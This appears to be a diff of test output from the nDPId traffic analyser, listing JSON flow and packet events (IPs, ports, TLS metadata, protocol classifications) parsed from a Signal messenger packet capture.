+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1569051266743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1569051266743,"pkt":"xGGLNYKpxiwDYGpkCABFAABMyV8AADQGy0oXORgQwKgCEQG73rjhiC89LB07wYAYAQKXnQAAAQEICpZOdF0oVP9fFwMDABNN53WS+HQ+OdIkNGbGHI++PaTs"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051267121,"flow_last_seen":1569051267121,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051267121,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1569051267121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051267121,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGbbHAqAIRDSP9Kt7DAbsjR8rsAAAAALAC\/\/\/U1AAAAgQFtAEDAwcBAQgKKFWeFwAAAAAEAgAA"} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569051267154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051267154,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAPEG\/LQNI\/0qwKgCEQG73sO\/wI8zI0fK7aAScSCWtAAAAgQFrAQCCAqvNN\/RKFWeFwEDAwg="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569051267161,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051267161,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGbb3AqAIRDSP9Kt7DAbsjR8rtv8CPNIAQBAsybAAAAQEICihVnjqvNN\/R"} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051267121,"flow_last_seen":1569051267161,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051267161,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":378,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":379,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","server_names":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, 
ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=cdn.signal.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"81:3D:8A:2E:EE:B2:E1:F4:1C:2B:6D:20:16:54:B2:C1:87:D0:1E:12"}} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569051245838,"flow_last_seen":1569051261595,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051255515,"flow_last_seen":1569051255541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
-00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051255515,"flow_last_seen":1569051255541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051255515,"flow_last_seen":1569051255541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051255515,"flow_last_seen":1569051255541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569051266396,"flow_last_seen":1569051267048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569051266396,"flow_last_seen":1569051267048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051247599,"flow_last_seen":1569051247843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11628,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051264078,"flow_last_seen":1569051264482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12235,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247600,"flow_last_seen":1569051261087,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247601,"flow_last_seen":1569051261087,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051247603,"flow_last_seen":1569051261087,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264090,"flow_last_seen":1569051264669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264091,"flow_last_seen":1569051264679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264093,"flow_last_seen":1569051264674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1569051264666,"flow_last_seen":1569051265237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17722,"flow_avg_l4_payload_len":466,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051257169,"flow_last_seen":1569051257194,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":5,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051257169,"flow_last_seen":1569051257194,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":5,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1569051247594,"flow_last_seen":1569051257495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3653,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1569051264073,"flow_last_seen":1569051267100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4493,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} 
-00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":265,"flow_first_seen":1569051267121,"flow_last_seen":1569051267601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":198733,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569051266396,"flow_last_seen":1569051267048,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569051266396,"flow_last_seen":1569051267048,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051247599,"flow_last_seen":1569051247843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11628,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051264078,"flow_last_seen":1569051264482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12235,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247600,"flow_last_seen":1569051261087,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247601,"flow_last_seen":1569051261087,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051247603,"flow_last_seen":1569051261087,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} 
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264090,"flow_last_seen":1569051264669,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264091,"flow_last_seen":1569051264679,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264093,"flow_last_seen":1569051264674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
